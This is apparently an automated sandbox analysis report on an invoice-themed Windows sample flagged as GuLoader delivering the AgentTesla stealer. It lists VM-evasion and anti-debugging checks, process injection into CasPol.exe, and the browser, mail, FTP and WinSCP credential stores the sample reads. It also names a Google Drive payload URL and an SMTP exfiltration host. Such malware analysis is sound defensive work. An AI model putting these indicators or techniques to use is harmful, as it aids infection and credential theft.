            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: CasPol.exe, 00000005.00000002.9190290777.0000000000F30000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1XFUZ6Q4YBDYDWXM8OW_8Y-LMZTRORBTM
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4456358135.0000000002C30000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4456358135.0000000002C30000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9190290777.0000000000F30000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4455279729.0000000000794000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2824Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9947
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeSystem information queried: ModuleInformation
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 00000005.00000002.9188774558.0000000000E62000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWh
            Source: CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWH
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4456358135.0000000002C30000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9190290777.0000000000F30000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: CasPol.exe, 00000005.00000002.9190290777.0000000000F30000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4457563191.00000000039F9000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4455279729.0000000000794000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: CasPol.exe, 00000005.00000002.9192103178.0000000002A99000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: FAKTURA 9502461485.exe, 00000001.00000002.4456358135.0000000002C30000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00926948 KiUserExceptionDispatcher,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C10000
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: C:\Users\user\Desktop\FAKTURA 9502461485.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
            Source: CasPol.exe, 00000005.00000002.9191569825.0000000001640000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000012.00000002.9188949367.0000024D51FB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 00000005.00000002.9191569825.0000000001640000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000012.00000002.9188949367.0000024D51FB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000005.00000002.9191569825.0000000001640000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000012.00000002.9188949367.0000024D51FB0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000005.00000002.9191569825.0000000001640000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000012.00000002.9188949367.0000024D51FB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7068, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7068, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7068, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 530352 Sample: FAKTURA 9502461485.exe Startdate: 29/11/2021 Architecture: WINDOWS Score: 100 23 mail.furteksdokuma.com.tr 2->23 25 furteksdokuma.com.tr 2->25 27 3 other IPs or domains 2->27 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected GuLoader 2->39 41 3 other signatures 2->41 8 FAKTURA 9502461485.exe 1 2 2->8         started        11 UserOOBEBroker.exe 2->11         started        signatures3 process4 signatures5 43 Writes to foreign memory regions 8->43 45 Tries to detect Any.run 8->45 47 Hides threads from debuggers 8->47 13 CasPol.exe 11 8->13         started        17 CasPol.exe 8->17         started        19 conhost.exe 8->19         started        process6 dnsIp7 29 furteksdokuma.com.tr 116.202.203.61, 49801, 587 HETZNER-ASDE Germany 13->29 31 drive.google.com 142.250.185.206, 443, 49789 GOOGLEUS United States 13->31 33 googlehosted.l.googleusercontent.com 216.58.212.161, 443, 49790 GOOGLEUS United States 13->33 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->49 51 Tries to steal Mail credentials (via file / registry access) 13->51 53 Tries to harvest and steal ftp login credentials 13->53 59 3 other signatures 13->59 21 conhost.exe 13->21         started        55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 17->57 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FAKTURA 9502461485.exe30%VirustotalBrowse
            FAKTURA 9502461485.exe27%ReversingLabsWin32.Worm.GenericML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            furteksdokuma.com.tr0%VirustotalBrowse
            mail.furteksdokuma.com.tr0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.microso0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://v5ifWTQoxKpuwYqKikIm.org0%Avira URL Cloudsafe
            http://furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://mail.furteksdokuma.com.tr0%Avira URL Cloudsafe
            http://vyecoW.com0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.206
            truefalse
              high
              googlehosted.l.googleusercontent.com
              216.58.212.161
              truefalse
                high
                furteksdokuma.com.tr
                116.202.203.61
                truetrueunknown
                mail.furteksdokuma.com.tr
                unknown
                unknowntrueunknown
                doc-14-5g-docs.googleusercontent.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-14-5g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u9ko47t95uihbncisipqv3ulq/1638192300000/15863333049961931076/*/1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.microsoUserOOBEBroker.exe, 00000012.00000002.9187314221.0000024D518A0000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://127.0.0.1:HTTP/1.1CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://DynDns.comDynDNSCasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sectigo.com/CPS0CasPol.exe, 00000005.00000002.9207760801.000000001FF65000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9207548099.000000001FF3D000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9188427439.0000000000E36000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://doc-14-5g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881uCasPol.exe, 00000005.00000003.4426480149.0000000000EAF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189229875.0000000000EA3000.00000004.00000020.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://drive.google.com/CasPol.exe, 00000005.00000002.9188774558.0000000000E62000.00000004.00000020.sdmpfalse
                        high
                        http://v5ifWTQoxKpuwYqKikIm.orgCasPol.exe, 00000005.00000002.9201317444.000000001DE8A000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9201540871.000000001DEB2000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://furteksdokuma.com.trCasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://mail.furteksdokuma.com.trCasPol.exe, 00000005.00000002.9201595401.000000001DEB8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-14-5g-docs.googleusercontent.com/DDCasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmpfalse
                          high
                          https://doc-14-5g-docs.googleusercontent.com//CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpfalse
                            high
                            http://vyecoW.comCasPol.exe, 00000005.00000002.9200234712.000000001DDB1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-14-5g-docs.googleusercontent.com/CasPol.exe, 00000005.00000003.4431938540.0000000000EA8000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.9189112678.0000000000E96000.00000004.00000020.sdmpfalse
                              high
